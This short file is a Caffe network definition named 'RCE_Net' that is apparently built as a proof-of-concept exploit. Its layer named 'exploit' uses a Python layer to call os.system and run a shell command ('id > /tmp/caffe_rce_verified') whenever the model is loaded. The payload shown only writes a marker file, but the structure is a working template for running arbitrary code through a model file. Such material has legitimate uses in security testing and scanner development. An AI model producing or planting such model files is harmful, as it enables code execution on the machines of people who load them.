File size: 350 Bytes
daff0d0 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | name: "RCE_Net"
input: "data"
input_shape {
dim: 1
dim: 3
dim: 224
dim: 224
}
layer {
name: "exploit"
type: "Python"
bottom: "data"
top: "exploit"
python_param {
module: "os"
layer: "system"
param_str: "id > /tmp/caffe_rce_verified"
}
}
layer {
name: "output"
type: "Softmax"
bottom: "exploit"
top: "output"
}
|